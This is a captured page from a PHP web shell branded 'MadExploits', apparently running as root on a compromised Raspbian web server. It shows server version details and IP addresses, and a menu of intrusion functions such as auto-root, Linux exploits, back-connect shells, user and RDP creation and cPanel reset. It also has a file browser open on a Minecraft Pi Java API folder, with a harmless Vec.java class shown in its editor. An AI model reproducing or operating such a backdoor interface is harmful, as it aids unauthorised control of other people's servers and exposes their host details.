Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
minecraft-pi /
api /
java /
src-api /
pi /
[ HOME SHELL ]
Name
Size
Permission
Action
event
[ DIR ]
drwxr-xr-x
tool
[ DIR ]
drwxr-xr-x
Block.java
3.68
KB
-rw-r--r--
Color.java
329
B
-rw-r--r--
Connection.java
2.95
KB
-rw-r--r--
EventFactory.java
1
KB
-rw-r--r--
Item.java
2.41
KB
-rw-r--r--
Log.java
330
B
-rw-r--r--
Minecraft.java
7.26
KB
-rw-r--r--
Vec.java
2.13
KB
-rw-r--r--
VecFloat.java
1.84
KB
-rw-r--r--
package.html
36
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Vec.java
package pi; import java.util.Scanner; /** * * @author Daniel Frisk, twitter:danfrisk */ public class Vec { public final static Vec ZERO = new Vec(0, 0, 0); public final static int MIN_Y = -128, MAX_Y = 127; public final int x, y, z; Vec(int x, int y, int z) { this.x = x; this.y = y; this.z = z; } /** * Create */ public static Vec xyz(int x, int y, int z) { return new Vec(x, y, z); } /** * Add */ public Vec add(Vec v) { return xyz(x + v.x, y + v.y, z + v.z); } /** * Add */ public Vec add(int x, int y, int z) { return xyz(this.x + x, this.y + y, this.z + z); } /** * Subtract */ public Vec sub(Vec v) { return xyz(x - v.x, y - v.y, z - v.z); } /** * Multiply with integer (scale) */ public Vec mul(int s) { return xyz(s * x, s * y, s * z); } /** * Negate (multiply with -1) */ public Vec neg() { return xyz(-x, -y, -z); } /** * Scalar product */ public int dot(Vec v) { return x * v.x + y * v.y + z * v.z; } @Override public int hashCode() { return x | (y << 20) | (z << 10); } @Override public boolean equals(Object obj) { if (obj == null || !(obj instanceof Vec)) { return false; } return hashCode() == ((Vec) obj).hashCode(); } @Override public final String toString() { return x + "," + y + "," + z; } static Vec decode(String encoded) { Scanner s = new Scanner(encoded).useDelimiter("\\,"); return xyz(s.nextInt(), s.nextInt(), s.nextInt()); } /** * A vector with length=1 */ public static class Unit extends Vec { public final static Unit X = new Unit(1, 0, 0); public final static Unit Y = new Unit(0, 1, 0); public final static Unit Z = new Unit(0, 0, 1); Unit(int x, int y, int z) { super(x, y, z); } @Override public Unit neg() { return new Unit(-x, -y, -z); } } }
Close